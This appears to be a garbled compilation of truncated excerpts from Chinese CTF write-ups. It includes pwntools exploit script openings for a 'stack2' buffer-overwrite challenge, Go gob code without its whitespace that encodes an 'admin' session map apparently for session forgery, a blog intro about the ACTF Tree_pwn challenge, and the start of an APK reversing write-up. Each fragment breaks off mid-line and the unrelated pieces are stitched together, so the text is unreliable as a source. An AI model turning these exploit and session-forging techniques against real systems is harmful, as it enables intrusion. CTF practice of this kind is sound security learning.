from pwn import * p = process('./stack2') p.sendlineafter('you have:','1') p.sendlineafter('Give me your numbers','1') def change(a,b): p.sendlineafter('5. exit','3') p.recvuntil('which number to change:') p.sendline(str(a)) p.recvuntil('new number:') p.sendline(str...
error){for_,v:=rangeobj{gob.Register(v)}buf:=bytes.NewBuffer(nil)err:=gob.NewEncoder(buf).Encode(obj)returnbuf.Bytes(),err}funcDecodeGob(encoded[]byte)(map[interface{}]interface{},error){buf:=bytes.NewBuffer(encoded)dec:=gob.NewDecoder(buf)varoutmap[interface{}]interface{}err...
error){for_,v:=rangeobj{gob.Register(v)}buf:=bytes.NewBuffer(nil)err:=gob.NewEncoder(buf).Encode(obj)returnbuf.Bytes(),err}funcmain(){varuidint64=1obj:=map[interface{}]interface{}{"username":"admin","UID":uid}data,err:=EncodeGob(obj)iferr...
今年的XCTF最后一战ACTF圆满结束了,战队最后也是稳住了19名,应该能拿到决赛门票。 但ACTF中,pwn题凄惨爆零。虽然只有俺做,但这不能成为摆烂的理由,毕竟要不断成长为战队主力,而且身边有很多很强的同龄师傅,更不应该气馁。 在军训途中复现了Tree_pwn,在uuu师傅(https://caffeine.darkflow.top/)的引导下学到了如...
from pwn import * offset = 0x84 #p = remote('111.198.29.45',58615) p = process('./stack2') p.sendlineafter("How many numbers you have:",'1') p.sendlineafter("Give me your numbers",'1') # 由于总共要完成8次覆写,并且还需要按照程序的流程正常运转,故需要写一个简易的函数; def chan...
Web-easy apk 打开APK后发现有两个窗口,一个用于验证用户名密码,一个用于提交邮件,APK会将用户名密码等信息提交到远程服务器做验证,提交前会对用户的输入做一次简单的加密。 加密函数位于libnative-lib.so中的Change函数中,如下,主要是使用密钥对数据进行循环的异或加密。在加密前会将输入字符串逆序。加密后转化为...